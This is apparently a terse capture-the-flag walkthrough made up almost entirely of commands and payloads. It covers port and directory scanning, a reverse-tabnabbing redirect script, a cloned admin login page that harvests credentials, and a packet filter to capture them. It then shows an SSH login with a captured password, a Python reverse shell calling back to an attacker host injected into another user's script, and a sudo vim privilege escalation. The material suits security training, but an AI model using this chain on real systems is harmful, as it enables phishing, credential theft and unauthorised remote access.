Copy nmap -sV -sT -O -p 1-65535 $VICTIM
Copy gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Copy echo "hi" > test.html
python2 -m SimpleHTTPServer 82
Copy <!DOCTYPE html>
<html>
<body>
<script>
window.opener.location = "http://$KALI:8000/redir.html";
</script>
</body>
</html>
Copy <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Login</title>
<link rel="stylesheet" href="<https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css>">
<style>
body{ font: 14px sans-serif; }
.wrapper{ width: 360px; padding: 20px; }
</style>
</head>
<body>
<div class="wrapper">
<h2>Admin Login</h2>
<p>Please fill in your credentials to login.</p>
<form action="/admin/login.php" method="post">
<div class="form-group">
<label>Username</label>
<input type="text" name="username" class="form-control " value="">
<span class="invalid-feedback"></span>
</div>
<div class="form-group">
<label>Password</label>
<input type="password" name="password" class="form-control ">
<span class="invalid-feedback"></span>
</div>
<div class="form-group">
<input type="submit" class="btn btn-primary" value="Login">
</div>
<br>
</form>
</div>
</body>
</html>
Copy python2 -m SimpleHTTPServer 82
Copy python2 -m SimpleHTTPServer 8000
Copy tcp.port==8000 && ip.dst == $VICTIM
Copy ssh daniel@$VICTIM
Password: C@ughtm3napping123 there is another user on this box. In their home directory they have a python script that looks like it checks the website. I added the following to the code to get a reverse shell.
Copy import os,pty,socket;s=socket.socket();s.connect(("$KALI",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")
Copy script -qc /bin/bash /dev/null
ctrl + Z
stty raw -echo;fg
Copy sudo vim -c ':!/bin/sh'
id 
